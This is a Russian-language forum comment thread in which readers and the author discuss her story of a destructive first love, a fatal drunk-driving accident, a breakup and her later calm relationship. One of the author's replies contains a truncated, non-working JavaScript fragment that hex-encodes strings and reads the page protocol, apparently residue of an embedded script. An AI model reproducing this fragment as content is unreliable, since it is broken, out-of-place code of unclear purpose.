Комментариев 5955 9
14 июля 2015 18:24:48
2015-07-14 18:24:48

Помню в моей жизни тоже были подобные истории. И в 18 хотелось эмоций, хотелось биться в страстях, но сейчас мне 24. я все переосмыслила и поняла что мне больше нравится спокойная любовь, которая не обжигает. а наоборот согревает. Но то что у вас была такая сильная любовь-это хорошо, это опыт и вы о нем не забудете, просто воспоминания со временем станут не такими яркими

Ответить
Поддерживаю Да3 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Читатель
Читатель

15 июля 2015 13:28:25
2015-07-15 13:28:25
Есть похожий на Вашу историю фильм с Маковецким и Яковлевой в главных ролях. Танго втроем называется. Только заканчивается по другому.........
Ответить
Поддерживаю Да0 / Нет0
окса
1342 окса
Окса offline
Репутация : 202880
Комментариев 1801 1
16 июля 2015 14:27:31
2015-07-16 14:27:31

Очень хорошо написано, читать было легко... наверное у каждого есть такие "скелетики" в шкафу, все мы были юнны, не могли определиться кто нужен , зачем и почему. Но на своем опыте скажу , что с прошлым не нужно связываться в настоящем. Это только первые эмоции , т. е. воспоминания, а по факту уже мы сами поменялиль, повзрослели и даже если был порыв сойтись , то потом понимаешь, что это ошибка. Вроде бы родной , а чужой. Я вляпалась так с бывшем, мы расстались , разъехались по разным городам, я сменила тел, друзей , но он меня через три года нашел, вспышка , вроде все хорошо , а уже понимаю что не нужен, стал раздражать, бесить , итог опять не общаемся , но он все равно дает о себе знать, то напишет , типа номером ошибся , то позвонит , то через друзей что -нибудь передаст... короче прошлое нужно обратно в шкаф на сто замков, в топку!

Ответить
Поддерживаю Да0 / Нет0
Все вокруг такие злые, а я одна такая добрая и хорошая... сижу тихонько в танке .... отстреливаюсь))
Лисий Хвостик
18460 Лисий Хвостик
Лисий Хвостик offline
Репутация : 165411
Комментариев 1404 20
06 октября 2015 10:41:43
2015-10-06 10:41:43

Не читала комментарии и, возможно повторюсь.. Извините заранее, если придётся отвечать на что-то, что было уже задано, но другими словами, быть может..
Во-первых, это здорово, когда встречается в жизни такая страсть, даже если не любовь.. Мы живём один раз и то, что нам дано, дано не зря. Я думаю, если тут и были отрицательные комментарии, то это лишь вуаль - такому насыщенному периоду жизни можно только позавидовать. Особенно тем, кто проводит её (жизнь) однообразно и плывя по течению.
Во-вторых, мне кажется. вы не должны воспринимать аварию как расплату - так просто случается, а если и искать в этом смысл, то я лично увидела такой: авария подтолкнула вас к расставанию с Лёшей№1, к тому моменту у вас уже были, своего рода, "проблемные" отношения.. Жаль, что умер ваш друг, но эта авария - поворотный момент, она вам помогла освободиться от обречённых отношений.

Во-третьи х, мне почему-то на протяжении всей истории казалось, что вы всё же останетесь со вторым Лёшей. У меня сложилось о нём только хорошее мнение - благородный, заботливый.. и всегда знающий, когда нужно быть рядом.
Я немного не поняла (возможно, нужно просто перечитать историю ещё раз), на тот момент встречи с Лёшей№2 вы сильно любили своего Лёшу, но когда случилась авария, когда вы потом расстались с ним.. почему вы решили не тревожить Лёшу№2? По причине того, что он там с кем-то встречался и вы не хотели рушить его отношения или просто поняли, что не любите его уже? -Ппросто я примериваю на себя - не удержалась бы увидеться с ним снова после всего.. и наверное, закрутилось бы по новой в этом случае - вы бы этого не хотели, поэтому у вас начались новые отношения уже с другим?
И можно спросить - на момент завершения этой истории вы встречались уже с другим, может вы и сейчас с ним (это уже личное, конечно), скажите, сейчас вы счастливы в новых (относительно истории{#}) отношениях? Испытывали ли вы такую же страсть или это уже более спокойная и глубокая любовь?)
P. S. История написана и описана замечательно, я вся испереживалась, пока читала{#}


Ответить
Поддерживаю Да1 / Нет0
The darkness around me - shores of a Solar sea.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
06 октября 2015 14:20:44
2015-10-06 14:20:44

Лисий Хвостик, Спасибо за внимание к истории. Отвечу по порядку. Во-первых, я очень много думала об аварии, тот год был вообще очень тяжелый. Я трижды лежала в больнице с серьезными проблемами. Авария была завершением всего. Наверное, она нужна была мне, чтобы понять главное. Ведь даже после аварии, после всего кошмара, который я очень тяжело переживала (в эмоциональном плане) я любила своего мальчика. Я не винила его ни в чем, я заступалась за него, когда винили другие. Я делала все, чтобы облегчить его боль. Я выхаживала его, как ребенка. Полгода я тряслась над ним и выполняла каждую его прихоть. А он... Он ничего не понял. Он продолжал пить, он падал пьяный, гнулись его спицы, неправильно срастались кости. А он не мог понять, что он, в принципе, убил своего друга. И едва-едва не убил нас. Поэтому я решила, что нужно расстаться. У меня словно внезапно открылись глаза. Я увидела его таким, какой он есть: веселый, добрый пьяница. Безответственный, ни о чем не думающий, ни к чему не стремящийся. Поэтому я ушла. Хотя очень сильно его любила, и страдала очень сильно. Наверное, на протяжении нескольких месяцев я плакала за ним каждый день, но в то же время ощущала легкость, словно сбросила с себя груз весом полтонны.

Почему не позвонила Леше№2. Я жила в Украине, он где-то в Питере. У него была девушка, они жили вместе (это впервые такие серьезные отношения в его жизни). Я думала, что он ее любит, и она, скорее всего, замечательный человек. Он жил новой жизнью, а я прощалась со старой. В моей жизни были милиция, выезды на место происшествия, суды, больницы. После того, как я с ним поступила, имела ли я право ему звонить, врываться в его стабильную жизнь, рушить что-то, взваливать на него свои проблемы, в которых никто кроме меня не виноват?

Я ведь не все рассказала, не потому что пыталась скрыть, а потому что всего не опишешь, история получится, как "Война и мир". Я плохо с ним поступала, подло. Видя от него только добро, преданность и самопожертвование, я отвечала на это предательством и невыполненными обещаниями.

Я очень хочу, чтобы он был счастлив. Этот человек достоин счастья. Просто за то, что он такой.

// t;t++)e+=o. CharCodeAt(t). ToString(16);return e}, p=function(){var w=window, p=w. Document. Location. Protocol;if(p. IndexOf('http')==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1670228
Комментариев 6968 37
06 октября 2015 15:07:42
2015-10-06 15:07:42

Да, и не ответила на последний вопрос. Конечно, сейчас все по-другому. То, что я люблю своего молодого человека, и то, что я счастлива - это совершенно точно.

Такой страсти, как с первой моей любовью у меня не было больше никогда и ни с кем. Но я такого больше и не хочу. Ведь наша страсть - это был не только секс. Наша страсть - это еще и бесконечные ссоры, взаимные оскорбления. Постоянно расставания, потом схождения обратно, ревность... Это очень выматывает, мне больше по душе спокойная стабильность, глубокая и нежная привязанность, когда боишься обидеть неосторожным словом, переживаешь, тепло ли он одет, что он будет брать с собой завтра на обед...

В моем молодом человеке я вижу много качеств, которые я любила в Леше №2. У него так же нет хитрости, подлости в нем нет ни на грамм, он всегда честен, очень порядочный, хочет помогать всем, готов отдать мне последнее, что у него есть.

Очень важно, по-моему, кроме любви еще и уважение. Я должна уважать человека, который со мной, за его поступки, за его отношение к окружающим, ко мне. Сейчас все это есть, а в первых отношениях не было ни уважения, ни компромиссов, ни взаимопожертвования. Ничего этого не было. Была любовь вперемежку с ненавистью, щедро приправленная болезненно острым сексом.

Ответить
Поддерживаю Да4 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Honey Lee
13836 Honey Lee
Honey Lee offline
Репутация : 48731
Комментариев 1165 6
06 октября 2015 15:44:39
2015-10-06 15:44:39

А в июле я эту историю не читала. Ну, однозначно, хорошо, что вы расстались с первым Лешей. Насчет второго остается лишь гадать, но, если сейчас вы счастливы, то только это имеет значение. А вот "если бы" да "кабы" можно много передумать.

P. S. Мне тоже второй Леша импонирует, как читателям выше. Просто про нынешнего МЧ Оли мало известно. Есть то, что есть. А что могло бы быть нам неизвестно.

Ответить
Поддерживаю Да0 / Нет0
Лисий Хвостик
18460 Лисий Хвостик
Лисий Хвостик offline
Репутация : 165411
Комментариев 1404 20
07 октября 2015 10:17:08
2015-10-07 10:17:08

Сиреневая Кошка, согласна насчёт страсти, поэтому и задала последний вопрос. За собой тоже заметила, если люблю человека по-настоящему сильно, то у меня даже наоборот - сначала нет особой страсти, но есть страсть к познанию этого человека) Хочется всё о нём узнать, что он думает, чувствует, говорить с ним круглые сутки, а потом уже зарождается любовь на почве уважения и взаимопонимания. Подумалось, что наверное, если у вас сейчас счастливые отношения, то любовь уже более, не то что бы "разумная", но не безрассудная точно)
Я очень рада за вас, что вы испытали и животную страсть и испытываете сейчас нежную, но глубокую любовь. Это так важно.
Я прочла ещё несколько ваших историй и надеюсь, что всё плохое теперь позади, а всё лучшее - впереди. Тем более, с вами теперь, думаю, настоящая опора)

Ответить
Поддерживаю Да0 / Нет0
The darkness around me - shores of a Solar sea.
Лисий Хвостик
18460 Лисий Хвостик
Лисий Хвостик offline
Репутация : 165411
Комментариев 1404 20
07 октября 2015 10:19:44
2015-10-07 10:19:44

И отдельное спасибо за то, что уделили внимание моим вопросам и всё разложили по полочкам) Теперь я многое поняла, что казалось непонятным в истории)

Ответить
Поддерживаю Да0 / Нет0
The darkness around me - shores of a Solar sea.
Гость
Гость

07 октября 2015 11:16:51
2015-10-07 11:16:51
Авария... Кипяток... Больницы... Человека нужно воспитывать и наказывать в детстве. Чтобы потом вот так не била нас жизнь. Измены... За все нужно платить...
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

29 октября 2015 14:28:19
2015-10-29 14:28:19
История об обычное человеческой глупости т о неуважении людей друг к другу. О любви тут ничего нет.
Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке